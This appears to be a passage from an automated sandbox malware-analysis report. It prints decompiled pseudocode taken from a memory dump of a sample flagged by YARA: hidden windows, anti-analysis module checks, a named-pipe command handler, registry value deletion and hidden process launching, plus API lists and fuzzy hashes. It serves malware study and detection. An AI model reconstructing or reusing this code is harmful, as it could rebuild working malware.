                                    				intOrPtr _t36;
                                    				intOrPtr _t39;
                                    				struct HWND__* _t44;
                                    				intOrPtr _t47;
                                    				intOrPtr _t50;
                                    				void* _t51;
                                    				intOrPtr _t53;
                                    				intOrPtr _t56;
                                    				intOrPtr _t59;
                                    				struct HINSTANCE__* _t64;
                                    
                                    				_t25 =  *0x9e684; // 0x12af8f0
                                    				_t64 =  *((intOrPtr*)(_t25 + 0x10))(0);
                                    				memset( &_v52, 0, 0x30);
                                    				_t59 =  *0x9e688; // 0xf0000
                                    				E0008902D(1,  &_v144, 0x1e, 0x32, _t59 + 0x648);
                                    				_v48 = 3;
                                    				_v52 = 0x30;
                                    				_v12 =  &_v144;
                                    				_v44 = E00082E77;
                                    				_push( &_v52);
                                    				_t32 =  *0x9e694; // 0x12afa48
                                    				_v32 = _t64;
                                    				if( *((intOrPtr*)(_t32 + 8))() == 0) {
                                    					L6:
                                    					_t34 =  *0x9e718; // 0x30094
                                    					if(_t34 != 0) {
                                    						_t39 =  *0x9e694; // 0x12afa48
                                    						 *((intOrPtr*)(_t39 + 0x28))(_t34);
                                    					}
                                    					L8:
                                    					_t36 =  *0x9e694; // 0x12afa48
                                    					 *((intOrPtr*)(_t36 + 0x2c))( &_v144, _t64);
                                    					return 0;
                                    				}
                                    				_t44 = CreateWindowExA(0,  &_v144,  &_v144, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, _t64, 0);
                                    				 *0x9e718 = _t44;
                                    				if(_t44 == 0) {
                                    					goto L8;
                                    				}
                                    				ShowWindow(_t44, 0);
                                    				_t47 =  *0x9e694; // 0x12afa48
                                    				 *((intOrPtr*)(_t47 + 0x18))( *0x9e718);
                                    				while(1) {
                                    					_t50 =  *0x9e694; // 0x12afa48
                                    					_t51 =  *((intOrPtr*)(_t50 + 0x1c))( &_v80, 0, 0, 0);
                                    					if(_t51 == 0) {
                                    						goto L6;
                                    					}
                                    					if(_t51 == 0xffffffff) {
                                    						goto L6;
                                    					}
                                    					_t53 =  *0x9e694; // 0x12afa48
                                    					 *((intOrPtr*)(_t53 + 0x20))( &_v80);
                                    					_t56 =  *0x9e694; // 0x12afa48
                                    					 *((intOrPtr*)(_t56 + 0x24))( &_v80);
                                    				}
                                    				goto L6;
                                    			}

                                    APIs
                                    • memset.MSVCRT ref: 00082EF9
                                    • CreateWindowExA.USER32(00000000,?,?,00CF0000,80000000,80000000,000001F4,00000064,00000000,00000000,00000000,00000000), ref: 00082F77
                                    • ShowWindow.USER32(00000000,00000000), ref: 00082F8A
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Similarity
                                    • API ID: Window$CreateShowmemset
                                    • String ID: 0
                                    • API String ID: 3027179219-4108050209
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 70%
                                    			E00084D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
                                    				char _v516;
                                    				char _v556;
                                    				char _v564;
                                    				char _v568;
                                    				char _v572;
                                    				char _v576;
                                    				intOrPtr _v580;
                                    				char _v588;
                                    				signed int _v596;
                                    				intOrPtr _v602;
                                    				intOrPtr _v604;
                                    				char _v608;
                                    				CHAR* _v612;
                                    				CHAR* _v616;
                                    				signed int _v620;
                                    				signed int _v624;
                                    				signed int _v628;
                                    				signed int _v632;
                                    				char _v636;
                                    				intOrPtr _t119;
                                    				void* _t120;
                                    				signed int _t122;
                                    				intOrPtr _t123;
                                    				CHAR* _t124;
                                    				intOrPtr _t125;
                                    				CHAR* _t127;
                                    				WCHAR* _t130;
                                    				intOrPtr _t133;
                                    				intOrPtr _t137;
                                    				WCHAR* _t138;
                                    				intOrPtr _t142;
                                    				WCHAR* _t143;
                                    				CHAR* _t144;
                                    				intOrPtr _t145;
                                    				intOrPtr _t150;
                                    				intOrPtr _t153;
                                    				WCHAR* _t154;
                                    				signed int _t159;
                                    				WCHAR* _t160;
                                    				intOrPtr _t163;
                                    				intOrPtr _t165;
                                    				intOrPtr _t166;
                                    				intOrPtr _t170;
                                    				signed int _t173;
                                    				signed int _t178;
                                    				intOrPtr _t182;
                                    				WCHAR* _t184;
                                    				char _t186;
                                    				WCHAR* _t188;
                                    				intOrPtr _t200;
                                    				intOrPtr _t211;
                                    				signed int _t215;
                                    				char _t220;
                                    				WCHAR* _t231;
                                    				intOrPtr _t235;
                                    				intOrPtr _t238;
                                    				intOrPtr _t239;
                                    				intOrPtr _t246;
                                    				signed int _t248;
                                    				WCHAR* _t249;
                                    				CHAR* _t250;
                                    				intOrPtr _t262;
                                    				void* _t271;
                                    				intOrPtr _t272;
                                    				signed int _t277;
                                    				void* _t278;
                                    				intOrPtr _t280;
                                    				signed int _t282;
                                    				void* _t298;
                                    				void* _t299;
                                    				intOrPtr _t305;
                                    				CHAR* _t326;
                                    				void* _t328;
                                    				WCHAR* _t329;
                                    				intOrPtr _t331;
                                    				WCHAR* _t333;
                                    				signed int _t335;
                                    				intOrPtr* _t337;
                                    				void* _t338;
                                    				void* _t339;
                                    				void* _t353;
                                    
                                    				_t353 = __fp0;
                                    				_t337 = (_t335 & 0xfffffff8) - 0x26c;
                                    				_t119 =  *0x9e688; // 0xf0000
                                    				_v620 = _v620 & 0x00000000;
                                    				_t328 = __ecx;
                                    				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
                                    					L7:
                                    					_t120 = E0008B7A8(0x9b9c8,  &_v516); // executed
                                    					_t14 = _t120 + 1; // 0x1
                                    					E0008A86D( &_v556, _t14, _t351);
                                    					_t298 = 0x64;
                                    					_t122 = E0008A471( &_v556, _t298);
                                    					 *0x9e748 = _t122;
                                    					if(_t122 != 0) {
                                    						_push(0x4e5);
                                    						_t299 = 0x10;
                                    						_t123 = E0008E1BC(0x9b9cc, _t299); // executed
                                    						 *0x9e680 = _t123;
                                    						 *_t337 = 0x610;
                                    						_t124 = E000895E1(0x9b9cc);
                                    						_push(0);
                                    						_push(_t124);
                                    						_v612 = _t124;
                                    						_t125 =  *0x9e688; // 0xf0000
                                    						_t127 = E000892E5(_t125 + 0x228);
                                    						_t338 = _t337 + 0xc;
                                    						_v616 = _t127;
                                    						E000885D5( &_v612);
                                    						_t130 = E0008B269(_t127);
                                    						_t246 = 3;
                                    						__eflags = _t130;
                                    						if(_t130 != 0) {
                                    							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
                                    							 *_t328 = _t246;
                                    						}
                                    						E0008861A( &_v616, 0xfffffffe);
                                    						_t133 =  *0x9e688; // 0xf0000
                                    						_t22 = _t133 + 0x114; // 0xf0114
                                    						E00084A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
                                    						_t262 =  *0x9e688; // 0xf0000
                                    						_t339 = _t338 + 0x14;
                                    						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
                                    						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
                                    							L17:
                                    							asm("stosd");
                                    							asm("stosd");
                                    							asm("stosd");
                                    							asm("stosd");
                                    							asm("stosd");
                                    							_v572 = _t328;
                                    							_v576 =  *((intOrPtr*)(_t262 + 0x214));
                                    							_t137 =  *0x9e680; // 0x12afda0
                                    							_t138 =  *(_t137 + 8);
                                    							__eflags = _t138;
                                    							if(_t138 != 0) {
                                    								 *_t138(0, 0, 1,  &_v568,  &_v564); // executed
                                    							}
                                    							_v620 = _v620 & 0x00000000;
                                    							E0008E2C6(_t353,  &_v576); // executed
                                    							_pop(_t262);
                                    							_t142 =  *0x9e6b4; // 0x12afa98
                                    							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
                                    							__eflags = _t143;
                                    							if(_t143 == 0) {
                                    								E0008E2C6(_t353,  &_v588);
                                    								_t235 =  *0x9e6b4; // 0x12afa98
                                    								_pop(_t262);
                                    								 *((intOrPtr*)(_t235 + 0xc))(_v632);
                                    							}
                                    							__eflags =  *0x9e73c;
                                    							if( *0x9e73c <= 0) {
                                    								goto L36;
                                    							} else {
                                    								_t165 =  *0x9e680; // 0x12afda0
                                    								__eflags =  *(_t165 + 8);
                                    								if( *(_t165 + 8) != 0) {
                                    									_t231 =  *(_t165 + 0xc);
                                    									__eflags = _t231;
                                    									if(_t231 != 0) {
                                    										 *_t231(_v580);
                                    									}
                                    								}
                                    								_t166 =  *0x9e688; // 0xf0000
                                    								_t262 =  *((intOrPtr*)(_t166 + 0x214));
                                    								__eflags = _t262 - _t246;
                                    								if(_t262 == _t246) {
                                    									goto L36;
                                    								} else {
                                    									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
                                    									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
                                    										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
                                    										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
                                    											E000849A5();
                                    											asm("stosd");
                                    											asm("stosd");
                                    											asm("stosd");
                                    											asm("stosd");
                                    											_t170 =  *0x9e684; // 0x12af8f0
                                    											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
                                    											_t262 = _v602;
                                    											_t248 = 0x3c;
                                    											_t173 = _t262 + 0x00000002 & 0x0000ffff;
                                    											_v596 = _t173;
                                    											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
                                    											_t178 = _t262 + 0x0000000e & 0x0000ffff;
                                    											_v624 = _t178;
                                    											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
                                    											_t182 =  *0x9e688; // 0xf0000
                                    											_t184 = E0008FC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0);
                                    											_t339 = _t339 + 0xc;
                                    											__eflags = _t184;
                                    											if(_t184 >= 0) {
                                    												_t333 = E00088604(0x1000);
                                    												_v616 = _t333;
                                    												_pop(_t262);
                                    												__eflags = _t333;
                                    												if(_t333 != 0) {
                                    													_t186 = E0008109A(_t262, 0x148);
                                    													_t305 =  *0x9e688; // 0xf0000
                                    													_v636 = _t186;
                                    													_push(_t305 + 0x648);
                                    													_push(0xa);
                                    													_push(7);
                                    													_t271 = 2;
                                    													E0008902D(_t271,  &_v572);
                                    													_t272 =  *0x9e688; // 0xf0000
                                    													_t188 = E000860DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
                                    													_t339 = _t339 + 0x18;
                                    													_v632 = _t188;
                                    													__eflags = _t188;
                                    													if(_t188 != 0) {
                                    														_push(_v624 % _t248 & 0x0000ffff);
                                    														_push(_v628 & 0x0000ffff);
                                    														_push(_v596 % _t248 & 0x0000ffff);
                                    														_push(_v620 & 0x0000ffff);
                                    														_push(_v632);
                                    														_push( &_v572);
                                    														_t200 =  *0x9e688; // 0xf0000
                                    														__eflags = _t200 + 0x1020;
                                    														E00089640(_t333, 0x1000, _v636, _t200 + 0x1020);
                                    														E000885D5( &_v636);
                                    														E0008A911(_t333, 0, 0xbb8, 1);
                                    														E0008861A( &_v632, 0xfffffffe);
                                    														_t339 = _t339 + 0x44;
                                    													}
                                    													E0008861A( &_v616, 0xfffffffe);
                                    													_pop(_t262);
                                    												}
                                    											}
                                    										}
                                    										goto L36;
                                    									}
                                    									__eflags = _t262 - 2;
                                    									if(_t262 != 2) {
                                    										goto L36;
                                    									}
                                    									E000849A5();
                                    									asm("stosd");
                                    									asm("stosd");
                                    									asm("stosd");
                                    									asm("stosd");
                                    									_t211 =  *0x9e684; // 0x12af8f0
                                    									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
                                    									_t215 = _v602 + 0x00000002 & 0x0000ffff;
                                    									_v628 = _t215;
                                    									_t277 = 0x3c;
                                    									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
                                    									_t249 = E00088604(0x1000);
                                    									_v624 = _t249;
                                    									_pop(_t278);
                                    									__eflags = _t249;
                                    									if(_t249 != 0) {
                                    										_t220 = E000895E1(_t278, 0x32d);
                                    										_t280 =  *0x9e688; // 0xf0000
                                    										_push(_t280 + 0x228);
                                    										_t282 = 0x3c;
                                    										_v636 = _t220;
                                    										_push(_v628 % _t282 & 0x0000ffff);
                                    										E00089640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
                                    										E000885D5( &_v636);
                                    										E0008A911(_t249, 0, 0xbb8, 1);
                                    										E0008861A( &_v624, 0xfffffffe);
                                    									}
                                    									goto L41;
                                    								}
                                    							}
                                    						} else {
                                    							_t238 =  *((intOrPtr*)(_t262 + 0x214));
                                    							__eflags = _t238 - _t246;
                                    							if(_t238 == _t246) {
                                    								goto L17;
                                    							}
                                    							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
                                    							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
                                    								L36:
                                    								_t144 = E000895E1(_t262, 0x610);
                                    								_push(0);
                                    								_push(_t144);
                                    								_v616 = _t144;
                                    								_t145 =  *0x9e688; // 0xf0000
                                    								_t329 = E000892E5(_t145 + 0x228);
                                    								_v612 = _t329;
                                    								__eflags = _t329;
                                    								if(_t329 != 0) {
                                    									_t160 = E0008B269(_t329);
                                    									__eflags = _t160;
                                    									if(_t160 != 0) {
                                    										_t163 =  *0x9e684; // 0x12af8f0
                                    										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
                                    									}
                                    									E0008861A( &_v612, 0xfffffffe);
                                    								}
                                    								E000885D5( &_v616);
                                    								_t150 =  *0x9e688; // 0xf0000
                                    								lstrcpynW(_t150 + 0x438,  *0x9e740, 0x105);
                                    								_t153 =  *0x9e688; // 0xf0000
                                    								_t154 = _t153 + 0x228;
                                    								__eflags = _t154;
                                    								lstrcpynW(_t154,  *0x9e738, 0x105);
                                    								_t331 =  *0x9e688; // 0xf0000
                                    								_t117 = _t331 + 0x228; // 0xf0228
                                    								 *((intOrPtr*)(_t331 + 0x434)) = E00088FBE(_t117, __eflags);
                                    								E0008861A(0x9e740, 0xfffffffe);
                                    								E0008861A(0x9e738, 0xfffffffe);
                                    								L41:
                                    								_t159 = 0;
                                    								__eflags = 0;
                                    								L42:
                                    								return _t159;
                                    							}
                                    							__eflags = _t238 - 2;
                                    							if(_t238 != 2) {
                                    								goto L36;
                                    							}
                                    							goto L17;
                                    						}
                                    					}
                                    					L8:
                                    					_t159 = _t122 | 0xffffffff;
                                    					goto L42;
                                    				}
                                    				_t250 = E000895C7(0x6e2);
                                    				_v616 = _t250;
                                    				_t326 = E000895C7(0x9f5);
                                    				_v612 = _t326;
                                    				if(_t250 != 0 && _t326 != 0) {
                                    					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
                                    						_v620 = 1;
                                    					}
                                    					E000885C2( &_v616);
                                    					_t122 = E000885C2( &_v612);
                                    					_t351 = _v620;
                                    					if(_v620 != 0) {
                                    						goto L8;
                                    					}
                                    				}
                                    			}


                                    APIs
                                    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00084DC0
                                    • GetModuleHandleA.KERNEL32(00000000), ref: 00084DC7
                                    • lstrcpynW.KERNEL32(000EFBC8,00000105), ref: 0008526F
                                    • lstrcpynW.KERNEL32(000EFDD8,00000105), ref: 00085283
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: HandleModulelstrcpyn
                                    • String ID:
                                    • API String ID: 3430401031-0
                                    • Opcode ID: ae3128c5bf61f7131e0d1b683ef89ae83d4c83addd2df4ad547d9d14deb7b66d
                                    • Instruction ID: 161cbc9eeedcce8db67ccaa0b8f26abb365355608c06558398d668d8ddb63534
                                    • Opcode Fuzzy Hash: ae3128c5bf61f7131e0d1b683ef89ae83d4c83addd2df4ad547d9d14deb7b66d
                                    • Instruction Fuzzy Hash: 64E1AE71608341AFE750FF64DC86FAA73E9BB98314F04092AF584DB2D2EB74D9448B52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 54%
                                    			E000832A1() {
                                    				char _v8;
                                    				struct _OVERLAPPED* _v12;
                                    				struct _OVERLAPPED* _v16;
                                    				intOrPtr* _v20;
                                    				char _v24;
                                    				intOrPtr _v32;
                                    				signed int _v36;
                                    				intOrPtr* _v40;
                                    				char _v168;
                                    				char _v172;
                                    				intOrPtr _t41;
                                    				void* _t47;
                                    				char _t54;
                                    				char _t61;
                                    				intOrPtr _t64;
                                    				void* _t65;
                                    				void* _t68;
                                    				void* _t70;
                                    				void* _t72;
                                    				void* _t76;
                                    				struct _OVERLAPPED* _t82;
                                    				intOrPtr* _t83;
                                    				signed int _t84;
                                    				signed short* _t86;
                                    				intOrPtr* _t97;
                                    				signed short* _t105;
                                    				void* _t107;
                                    				void* _t108;
                                    				void* _t109;
                                    				intOrPtr* _t112;
                                    				struct _OVERLAPPED* _t113;
                                    				char _t114;
                                    				void* _t115;
                                    
                                    				_t113 = 0;
                                    				_t82 = 0;
                                    				_v8 = 0;
                                    				_v12 = 0;
                                    				while(1) {
                                    					_v16 = _t113;
                                    					if(ConnectNamedPipe( *0x9e674, _t113) == 0 && GetLastError() != 0x217) {
                                    						break;
                                    					}
                                    					_push(_t113);
                                    					_push( &_v16);
                                    					_t41 =  *0x9e684; // 0x12af8f0
                                    					_push(0x80000);
                                    					_push( *0x9e724);
                                    					_push( *0x9e674);
                                    					if( *((intOrPtr*)(_t41 + 0x88))() == 0 || _v16 == 0) {
                                    						GetLastError();
                                    					} else {
                                    						_t86 =  *0x9e724; // 0x17d0020
                                    						_t47 = ( *_t86 & 0x0000ffff) - 1;
                                    						if(_t47 == 0) {
                                    							_t112 = E000893BE( &(_t86[4]), 0x20, 1,  &_v24);
                                    							_v40 = _t112;
                                    							if(_t112 != 0) {
                                    								_t114 = _v24;
                                    								if(_t114 <= 1) {
                                    									_t113 = 0;
                                    									_t54 = E00081DA0(E00089749( *_t112), 0, 0, 0);
                                    									_t115 = _t115 + 0x10;
                                    									_v172 = _t54;
                                    								} else {
                                    									_v36 = _t114 - 1;
                                    									_t83 = E00088604(_t114 - 1 << 2);
                                    									_v32 = _t83;
                                    									if(_t83 == 0) {
                                    										_t113 = 0;
                                    									} else {
                                    										if(_t114 > 1) {
                                    											_v20 = _t83;
                                    											_t84 = 1;
                                    											do {
                                    												_t64 = E000891A6( *((intOrPtr*)(_t112 + _t84 * 4)), E0008C379( *((intOrPtr*)(_t112 + _t84 * 4))));
                                    												_t97 = _v20;
                                    												_t84 = _t84 + 1;
                                    												 *_t97 = _t64;
                                    												_v20 = _t97 + 4;
                                    											} while (_t84 < _t114);
                                    											_t83 = _v32;
                                    										}
                                    										_t113 = 0;
                                    										_t61 = E00081DA0(E00089749( *_t112), _t83, _v36, 0);
                                    										_t115 = _t115 + 0x10;
                                    										_v172 = _t61;
                                    										E000894B7( &_v24);
                                    									}
                                    									_t82 = _v12;
                                    								}
                                    							}
                                    							_t105 =  *0x9e724; // 0x17d0020
                                    							E000896CA( &_v168,  &(_t105[4]), 0x80);
                                    							_push(0x84);
                                    							_push( &_v172);
                                    							_push(2);
                                    							goto L33;
                                    						} else {
                                    							_t65 = _t47 - 3;
                                    							if(_t65 == 0) {
                                    								_push(_t113);
                                    								_push(_t113);
                                    								_t108 = 5;
                                    								E0008C319(_t108);
                                    								 *0x9e758 = 1;
                                    								_t82 = 1;
                                    								_v12 = 1;
                                    							} else {
                                    								_t68 = _t65;
                                    								if(_t68 == 0) {
                                    									_t70 = E0008F79F( &_v8);
                                    									goto L13;
                                    								} else {
                                    									_t72 = _t68 - 1;
                                    									if(_t72 == 0) {
                                    										E0008F79F( &_v8);
                                    										goto L16;
                                    									} else {
                                    										_t76 = _t72 - 1;
                                    										if(_t76 == 0) {
                                    											_t70 = E0008F7C1( &_v8);
                                    											L13:
                                    											if(_t70 == 0) {
                                    												_push(_t113);
                                    												_push(_t113);
                                    												_push(0xa);
                                    											} else {
                                    												_push(_v8);
                                    												_push(_t70);
                                    												_push(5);
                                    											}
                                    											_pop(_t109);
                                    											E0008C319(_t109);
                                    										} else {
                                    											if(_t76 == 1) {
                                    												E0008F7C1( &_v8);
                                    												L16:
                                    												_push(4);
                                    												_push( &_v8);
                                    												_push(5);
                                    												L33:
                                    												_pop(_t107);
                                    												E0008C319(_t107);
                                    												_t115 = _t115 + 0xc;
                                    											}
                                    										}
                                    									}
                                    								}
                                    							}
                                    						}
                                    					}
                                    					DisconnectNamedPipe( *0x9e674);
                                    					if(_t82 == 0) {
                                    						continue;
                                    					}
                                    					break;
                                    				}
                                    				return 0;
                                    			}


                                    APIs
                                    • ConnectNamedPipe.KERNELBASE(00000000), ref: 000832C6
                                    • GetLastError.KERNEL32 ref: 000832D0
                                      • Part of subcall function 0008C319: FlushFileBuffers.KERNEL32(000001F8), ref: 0008C35F
                                    • DisconnectNamedPipe.KERNEL32 ref: 000834B4
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: NamedPipe$BuffersConnectDisconnectErrorFileFlushLast
                                    • String ID:
                                    • API String ID: 2389948835-0
                                    • Opcode ID: 86978b340c489adfd94372cf0304dc1e2843ab24a0898238353e600af01e772a
                                    • Instruction ID: aec34d1c461da35ce7ea10a51bd790cfc71f6dd0dd97058cb51a1121444265f8
                                    • Opcode Fuzzy Hash: 86978b340c489adfd94372cf0304dc1e2843ab24a0898238353e600af01e772a
                                    • Instruction Fuzzy Hash: 4151E472A00215ABEB61FFA4DC89AEEBBB8FF45750F104026F584A6151DB749B44CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 80%
                                    			E000861B4(void* __edx, void* __fp0, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
                                    				void* _v8;
                                    				int _v12;
                                    				int _v16;
                                    				int _v20;
                                    				char _v24;
                                    				char _v28;
                                    				void* _v32;
                                    				void* _v36;
                                    				char _v40;
                                    				char _v44;
                                    				char _v48;
                                    				char _v56;
                                    				void _v576;
                                    				intOrPtr _t63;
                                    				intOrPtr _t72;
                                    				intOrPtr _t80;
                                    				intOrPtr _t81;
                                    				intOrPtr _t82;
                                    				signed int _t85;
                                    				intOrPtr _t87;
                                    				int _t89;
                                    				intOrPtr _t90;
                                    				intOrPtr _t92;
                                    				void* _t96;
                                    				void* _t97;
                                    				void* _t98;
                                    				void* _t99;
                                    				void* _t100;
                                    				void* _t108;
                                    
                                    				_t108 = __fp0;
                                    				_t96 = __edx;
                                    				_t89 = 0;
                                    				_v8 = 0;
                                    				memset( &_v576, 0, 0x208);
                                    				_v28 = 0x104;
                                    				_v20 = 0x3fff;
                                    				_v16 = 0;
                                    				_t98 = E00088604(0x3fff);
                                    				_t100 = _t99 + 0x10;
                                    				_v32 = _t98;
                                    				if(_t98 == 0) {
                                    					L18:
                                    					return 0;
                                    				}
                                    				_t97 = E00088604(0x800);
                                    				_v36 = _t97;
                                    				if(_t97 == 0) {
                                    					goto L18;
                                    				}
                                    				if(RegOpenKeyExW(_a4, _a8, 0, 0x2001f,  &_v8) != 0) {
                                    					L15:
                                    					if(_v8 != 0) {
                                    						_t63 =  *0x9e68c; // 0x12afab8
                                    						 *((intOrPtr*)(_t63 + 0x1c))(_v8);
                                    					}
                                    					E0008861A( &_v32, 0x3fff); // executed
                                    					E0008861A( &_v36, 0x800); // executed
                                    					goto L18;
                                    				}
                                    				_push( &_v56);
                                    				_push( &_v40);
                                    				_push( &_v44);
                                    				_push( &_v48);
                                    				_push( &_v24);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push( &_v28);
                                    				_push( &_v576);
                                    				_t72 =  *0x9e68c; // 0x12afab8
                                    				_push(_v8);
                                    				if( *((intOrPtr*)(_t72 + 0xb0))() == 0) {
                                    					__eflags = _v24;
                                    					if(_v24 == 0) {
                                    						goto L15;
                                    					}
                                    					_v12 = 0;
                                    					do {
                                    						memset(_t97, 0, 0x800);
                                    						memset(_t98, 0, 0x3fff);
                                    						_t100 = _t100 + 0x18;
                                    						_v20 = 0x3fff;
                                    						_v16 = 0x800;
                                    						 *_t98 = 0;
                                    						_t80 =  *0x9e68c; // 0x12afab8
                                    						_t81 =  *((intOrPtr*)(_t80 + 0xc8))(_v8, _t89, _t98,  &_v20, 0, 0, _t97,  &_v16);
                                    						__eflags = _t81;
                                    						if(_t81 == 0) {
                                    							_t82 =  *0x9e690; // 0x12afb90
                                    							_t90 =  *((intOrPtr*)(_t82 + 4))(_t97, _a12);
                                    							__eflags = _t90;
                                    							if(_t90 != 0) {
                                    								_t92 =  *0x9e68c; // 0x12afab8
                                    								 *((intOrPtr*)(_t92 + 0xa8))(_v8, _t98);
                                    								__eflags = _a16;
                                    								if(_a16 != 0) {
                                    									_t85 = E0008C392(_t90);
                                    									__eflags =  *((short*)(_t90 + _t85 * 2 - 2)) - 0x22;
                                    									if(__eflags == 0) {
                                    										__eflags = 0;
                                    										 *((short*)(_t90 + _t85 * 2 - 2)) = 0;
                                    									}
                                    									E0008B1B1(_t90, _t96, __eflags, _t108);
                                    								}
                                    							}
                                    							_t89 = _v12;
                                    						}
                                    						_t89 = _t89 + 1;
                                    						_v12 = _t89;
                                    						__eflags = _t89 - _v24;
                                    					} while (_t89 < _v24);
                                    					goto L15;
                                    				}
                                    				_t87 =  *0x9e68c; // 0x12afab8
                                    				 *((intOrPtr*)(_t87 + 0x1c))(_v8);
                                    				goto L15;
                                    			}

                                    APIs
                                    • memset.MSVCRT ref: 000861D2
                                      • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                                    • RegOpenKeyExW.KERNEL32(?,?,00000000,0002001F,?,?,?,00000001), ref: 0008622C
                                    • memset.MSVCRT ref: 00086295
                                    • memset.MSVCRT ref: 000862A2
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: memset$AllocateHeapOpen
                                    • String ID:
                                    • API String ID: 2508404634-0
                                    • Opcode ID: 8a8df3ec20745d9b8db935e1207a51dcdf7b99798a4571e88c74bfd6093f7efc
                                    • Instruction ID: 5df326356aa9df0f49ed8f656d01e6deee27922878838a2d55d254d8868e0780
                                    • Opcode Fuzzy Hash: 8a8df3ec20745d9b8db935e1207a51dcdf7b99798a4571e88c74bfd6093f7efc
                                    • Instruction Fuzzy Hash: 6C5128B1A00209AFEB51EF94CC85FEE7BBCBF04340F118069F545A7252DB759E048B60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 65%
                                    			E0008A911(WCHAR* _a4, DWORD* _a8, intOrPtr _a12, signed int _a16) {
                                    				struct _PROCESS_INFORMATION _v20;
                                    				struct _STARTUPINFOW _v92;
                                    				signed int _t24;
                                    				intOrPtr _t32;
                                    				intOrPtr _t34;
                                    				int _t42;
                                    				WCHAR* _t44;
                                    
                                    				_t42 = 0x44;
                                    				memset( &_v92, 0, _t42);
                                    				_v92.cb = _t42;
                                    				asm("stosd");
                                    				_t44 = 1;
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				_t24 = _a16;
                                    				if(_t24 != 0) {
                                    					_v92.dwFlags = 1;
                                    					_v92.wShowWindow = 0;
                                    				}
                                    				asm("sbb eax, eax");
                                    				if(CreateProcessW(0, _a4, 0, 0, 0,  ~_t24 & 0x08000000, 0, 0,  &_v92,  &_v20) == 0) {
                                    					_t44 = 0;
                                    				} else {
                                    					if(_a8 != 0) {
                                    						_push(_a12);
                                    						_t34 =  *0x9e684; // 0x12af8f0
                                    						_push(_v20.hProcess);
                                    						if( *((intOrPtr*)(_t34 + 0x2c))() >= 0) {
                                    							GetExitCodeProcess(_v20.hProcess, _a8);
                                    						}
                                    					}
                                    					CloseHandle(_v20.hThread);
                                    					_t32 =  *0x9e684; // 0x12af8f0
                                    					 *((intOrPtr*)(_t32 + 0x30))(_v20);
                                    				}
                                    				return _t44;
                                    			}

                                    APIs
                                    • memset.MSVCRT ref: 0008A925
                                    • CreateProcessW.KERNEL32(00000000,00001388,00000000,00000000,00000000,0008C1AB,00000000,00000000,?,00000000,00000000,00000000,00000001), ref: 0008A96C
                                    • GetExitCodeProcess.KERNELBASE(00000000,?), ref: 0008A990
                                    • CloseHandle.KERNELBASE(?), ref: 0008A99E
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CloseCodeCreateExitHandlememset
                                    • String ID:
                                    • API String ID: 2668540068-0
                                    • Opcode ID: 225cfbb69293b3eed798390d4c55be612c5650c273af84687da85cfb64abf4ec
                                    • Instruction ID: 69c2d589c2e0a2c9629c015d340a78d4e10d2ecd89ef4d1a65b39d481363986c
                                    • Opcode Fuzzy Hash: 225cfbb69293b3eed798390d4c55be612c5650c273af84687da85cfb64abf4ec
                                    • Instruction Fuzzy Hash: C0215C72A00118BFEF519FA9DC84EAFBBBCFF08380B014426FA55E6560D6349C00CB62
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 87%
                                    			E0008B012(void* __ecx, WCHAR* __edx) {
                                    				int _v8;
                                    				void _v528;
                                    				char _v1046;
                                    				void _v1048;
                                    				intOrPtr _t21;
                                    				intOrPtr* _t26;
                                    				void* _t27;
                                    				intOrPtr _t33;
                                    				intOrPtr _t36;
                                    				void* _t39;
                                    				intOrPtr _t40;
                                    				WCHAR* _t47;
                                    				void* _t49;
                                    
                                    				_t39 = __ecx;
